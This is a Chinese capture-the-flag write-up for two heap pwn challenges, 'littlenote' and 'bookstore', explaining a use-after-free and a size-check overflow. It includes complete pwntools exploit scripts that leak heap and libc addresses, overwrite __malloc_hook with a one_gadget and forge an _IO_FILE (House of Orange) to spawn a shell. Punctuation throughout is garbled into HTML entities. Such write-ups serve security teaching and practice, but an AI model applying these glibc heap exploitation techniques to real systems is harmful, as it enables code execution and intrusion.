信息安全铁人三项赛真题解析_信息安全铁人三项赛二进制部分题解

2018-2019赛季

little note

checksec

menu()

main()

增、删、查四个功能&＃xff0c;并且保护基本全开。

add()

这里需要注意的就是&＃xff0c;至多0xF个note并且大小固定0x60&＃xff0c;创建完成后会问是否保留&＃xff0c;若不保留的话会free掉当前note并创建一个0x20的备份。

show()

free()

freenote()有个UAF。

利用思路&＃xff1a;这里有个很巧妙的方法&＃xff0c;就是第一次利用UAF leak出heap地址&＃xff0c;第二次利用UAF将fd改到某个堆块中间申请到该地址溢出修改下一chunk的size&＃xff0c;free掉它利用UAF leak libc&＃xff0c;第三次UAF依旧是fastbin attack

leak heap:

需要注意的是&＃xff0c;不要delete(0)、delete(1)、show(1)&＃xff0c;这样leak不出来。

###leak heap###

add(&＃39;leakaaaa&＃39;,&＃39;Y&＃39;)#0

add(&＃39;leakbbbb&＃39;,&＃39;Y&＃39;)#1

add(&＃39;leakcccc&＃39;,&＃39;Y&＃39;)#2

add(&＃39;leakdddd&＃39;,&＃39;Y&＃39;)#3

add(&＃39;leakeeee&＃39;,&＃39;Y&＃39;)#4

delete(1)

delete(2)

show(2)

p.recv()

heap &＃61; u64(p.recvuntil(&＃39;\n&＃39;)[:-1].ljust(8,&＃39;\x00&＃39;)) - 0x70

log.success(&＃39;heap:&＃39;&＃43;hex(heap))

leak libc:

上图讲了一下每个chunk的作用&＃xff0c;初始我们是申请了5个chunk。

现在Double Free chunk1&＃xff1a;

修改FD&＃xff1a;

这里需要注意&＃xff0c;我决定选择120&＃xff0c;那么就要在118伪造好size。

Overflow to modify size:

可以看到chunk的size已经被修改了&＃xff0c;其实现在哪个chunk对应的下标我有点混&＃xff0c;不过不怕&＃xff0c;看fd&＃xff0c;是当时创建chunk写入的内容&＃xff0c;找到对应下标。

其实按照顺序来应该是chunk8&＃xff0c;但是free的话会报invaild next size.

###leak libc###

delete(1)

fake_chunk &＃61; heap &＃43; 0x0e0 &＃43; 0x30 &＃43; 0x10

over_chunk &＃61; heap &＃43; 0x150

add(p64(fake_chunk),&＃39;Y&＃39;)#chunk1 5

payload &＃61; &＃39;A&＃39; * 0x30 &＃43; p64(0) &＃43; p64(0x7f)

add(payload,&＃39;Y&＃39;)#overflow 2 6

add(&＃39;Nothing&＃39;,&＃39;Y&＃39;)#1 7

payload &＃61; &＃39;B&＃39; * 0x20 &＃43; p64(0) &＃43; p64(0xe1)

add(payload,&＃39;Y&＃39;)#fake_chunk to overflow

delete(3)

show(3)

offset &＃61; 0x7f2f41f79b78 - 0x7f2f41bb5000

libc_base &＃61; u64(p.recvuntil(&＃39;\x7f&＃39;)[-6:].ljust(8,&＃39;\x00&＃39;)) - 88 - offset

get shell:

接下来就简单了&＃xff0c;常规的劫持__malloc_hook

#! /usr/bin/python

from pwn import *

from LibcSearcher import *

p &＃61; process(&＃39;./littlenote&＃39;)

elf &＃61; ELF(&＃39;./littlenote&＃39;)

libc &＃61; ELF(&＃39;/lib/x86_64-linux-gnu/libc-2.23.so&＃39;)

#context.log_level &＃61; &＃39;debug&＃39;

def add(cont,choice):

p.recvuntil(&＃39;Your choice:&＃39;)

p.sendline(&＃39;1&＃39;)

p.recvuntil(&＃39;note&＃39;)

p.send(cont)

p.recvuntil(&＃39;?&＃39;)

p.sendline(choice)

def show(idx):

p.recvuntil(&＃39;Your choice:&＃39;)

p.sendline(&＃39;2&＃39;)

p.recvuntil(&＃39;?&＃39;)

p.sendline(str(idx))

def delete(idx):

p.recvuntil(&＃39;Your choice:&＃39;)

p.sendline(&＃39;3&＃39;)

p.recvuntil(&＃39;?&＃39;)

p.sendline(str(idx))

###leak heap###

add(&＃39;leakaaaa&＃39;,&＃39;Y&＃39;)#0

add(&＃39;leakbbbb&＃39;,&＃39;Y&＃39;)#1

add(&＃39;leakcccc&＃39;,&＃39;Y&＃39;)#2

add(&＃39;leakdddd&＃39;,&＃39;Y&＃39;)#3

add(&＃39;leakeeee&＃39;,&＃39;Y&＃39;)#4

delete(1)

delete(2)

show(2)

p.recv()

heap &＃61; u64(p.recvuntil(&＃39;\n&＃39;)[:-1].ljust(8,&＃39;\x00&＃39;)) - 0x70

log.success(&＃39;heap:&＃39;&＃43;hex(heap))

###leak libc###

delete(1)

fake_chunk &＃61; heap &＃43; 0x0e0 &＃43; 0x30 &＃43; 0x10

over_chunk &＃61; heap &＃43; 0x150

add(p64(fake_chunk),&＃39;Y&＃39;)#chunk1 5

payload &＃61; &＃39;A&＃39; * 0x30 &＃43; p64(0) &＃43; p64(0x7f)

add(payload,&＃39;Y&＃39;)#overflow 2 6

add(&＃39;Nothing&＃39;,&＃39;Y&＃39;)#1 7

payload &＃61; &＃39;B&＃39; * 0x20 &＃43; p64(0) &＃43; p64(0xe1)

add(payload,&＃39;Y&＃39;)#fake_chunk to overflow

delete(3)

show(3)

offset &＃61; 0x7f2f41f79b78 - 0x7f2f41bb5000

libc_base &＃61; u64(p.recvuntil(&＃39;\x7f&＃39;)[-6:].ljust(8,&＃39;\x00&＃39;)) - 88 - 0x3c4b20

log.success(&＃39;libc:&＃39;&＃43;hex(libc_base))

###get shell###

malloc_hook &＃61; libc_base &＃43; libc.symbols[&＃39;__malloc_hook&＃39;]

fake_chunk &＃61; malloc_hook - 0x23

one_gadget &＃61; [0x45216,0x4526a,0xf02a4,0xf1147]

one_gadget &＃61; libc_base &＃43; one_gadget[2]

delete(1)

delete(2)

delete(1)

add(p64(fake_chunk),&＃39;Y&＃39;)

add(&＃39;get shell&＃39;,&＃39;Y&＃39;)

add(&＃39;get shell&＃39;,&＃39;Y&＃39;)

payload &＃61; &＃39;A&＃39; * 0x13 &＃43; p64(one_gadget)

add(payload,&＃39;Y&＃39;)

###get shell###

p.interactive()

bookstore

main()

从主函数看得出来有整、删、查的功能&＃xff0c;看一下。

addbook()

一共最多16个book&＃xff0c;每个大小不得大于0x50&＃xff0c;跟进一下readn&＃xff1a;

readn

无符号数&＃xff0c;只要传入0就可以溢出。

sellbook()

readbook()

思路1&＃xff1a;

溢出修改next chunk size来leak libc&＃xff0c;House of Orange 劫持 _IO_FILE_PLUS.vtable

思路2&＃xff1a;

溢出修改next chunk size来leak libc&＃xff0c;溢出fastbin attack 劫持 修改ret。

先看第一种&＃xff1a;

leak libc

这里需要注意一下&＃xff0c;图示申请的chunk大小是0x21(包括头)。

这里注意了&＃xff0c;我不知道为什么&＃xff0c;后面的chunk要0x40&＃xff0c;不然会报Double Free.

修改chunk size使其进入unsorted bin中&＃xff0c;申请另外的chunk切割它得到libc。

###leak libc###

add(0,&＃39;a&＃39;*0x10)#0

add(0x40,&＃39;b&＃39;*0x10)#1

add(0x40,&＃39;c&＃39;*0x10)#2

add(0x40,&＃39;d&＃39;*0x10)#3

delete(0)

payload &＃61; &＃39;A&＃39; * 0x10 &＃43; p64(0) &＃43; p64(0xa1)

add(0,payload)#overwrite chunk 1

delete(1)

add(0x20,&＃39;aaaaaaaa&＃39;)#1

show(1)

p.recvuntil(&＃39;aaaaaaaa&＃39;)

libc_base &＃61; u64(p.recvuntil(&＃39;\x7f&＃39;)[-6:].ljust(8,&＃39;\x00&＃39;)) - 232 - 0x3c4b20

log.success(&＃39;libc base:&＃39;&＃43;hex(libc_base))

House of Orange – — FSOP

在这里再简单的提一下&＃xff1a;

malloc_printerr—>__libc_message—>abort—>_IO_flush_all_lockup—>_IO_overflow

这是一整条调用链&＃xff0c;我们可以利用unsorted bin attack将_IO_list_all改为main_arena&＃43;88&＃xff0c;然后修改原top chunk的size为0x61,然后伪造一整个_IO_FILE结构&＃xff0c;并修改vatle指针为_IO_str_jump。

需要注意_IO_str_jump不是导出符号&＃xff0c;不能用pwntools直接计算。

#! /usr/bin/python

from pwn import *

#p &＃61; process(&＃39;./bookstore&＃39;,env&＃61;{"LD_PRELOAD":"./libc_64.so"})

p &＃61; process(&＃39;./bookstore&＃39;)

elf &＃61; ELF(&＃39;./bookstore&＃39;)

libc &＃61; ELF(&＃39;./libc_64.so&＃39;)

#context.log_level &＃61; &＃39;debug&＃39;

def add(size,cont):

p.recvuntil(&＃39;Your choice:&＃39;)

p.sendline(&＃39;1&＃39;)

p.recvuntil(&＃39;What is the author name?&＃39;)

p.sendline(&＃39;Railgun&＃39;)

p.recvuntil(&＃39;How long is the book name?&＃39;)

p.sendline(str(size))

p.recvuntil(&＃39;What is the name of the book?&＃39;)

p.sendline(cont)

def delete(idx):

p.recvuntil(&＃39;Your choice:&＃39;)

p.sendline(&＃39;2&＃39;)

p.recvuntil(&＃39;?&＃39;)

p.sendline(str(idx))

def show(idx):

p.recvuntil(&＃39;Your choice:&＃39;)

p.sendline(&＃39;3&＃39;)

p.recvuntil(&＃39;?&＃39;)

p.sendline(str(idx))

###leak libc###

add(0,&＃39;a&＃39;*0x10)#0

add(0x40,&＃39;b&＃39;*0x10)#1

add(0x40,&＃39;c&＃39;*0x10)#2

add(0x40,&＃39;d&＃39;*0x10)#3

#gdb.attach(p)

delete(0)

payload &＃61; &＃39;A&＃39; * 0x10 &＃43; p64(0) &＃43; p64(0xa1)

add(0,payload)#overwrite chunk 1

delete(1)

add(0,&＃39;aaaaaaaa&＃39;)#1

show(1)

p.recvuntil(&＃39;aaaaaaaa&＃39;)

main_arena &＃61; u64(p.recvuntil(&＃39;\x7f&＃39;)[-6:].ljust(8,&＃39;\x00&＃39;))- 232

libc_base &＃61;main_arena - 0x3c4b20

log.success(&＃39;libc base:&＃39;&＃43;hex(libc_base))

###House Of Orange###

system &＃61; libc_base&＃43;libc.symbols[&＃39;system&＃39;]

sh &＃61; libc_base &＃43; libc.search("/bin/sh").next() &＃43; 0x40

io_list_all &＃61; libc_base &＃43; libc.symbols[&＃39;_IO_list_all&＃39;]

io_str_jump &＃61; libc_base &＃43; libc.symbols[&＃39;_IO_file_jumps&＃39;]&＃43;0xc0

#stream &＃61; &＃39;A&＃39; * 0x10 #overflow

stream &＃61; p64(0) &＃43; p64(0x61)

stream &＃43;&＃61; p64(0) &＃43; p64(io_list_all-0x10) #unsorted bin attack

stream &＃43;&＃61; p64(0) &＃43; p64(1) # _IO_write_base <#_IO_write_ptr

stream &＃43;&＃61; p64(0) &＃43; p64(sh)

stream &＃43;&＃61; p64(0) * 19

stream &＃43;&＃61; p64(io_str_jump-8) # str_jump

stream &＃61; stream.ljust(0xe8,&＃39;\x00&＃39;)

stream &＃43;&＃61; p64(system) # fp&＃43;0xe8&＃61;system

add(0,&＃39;A&＃39;*0x10&＃43;stream)

#gdb.attach(p)

###get shell###

p.sendline(&＃39;1&＃39;)

p.sendline(&＃39;1&＃39;)

p.sendline(&＃39;1&＃39;)

p.interactive()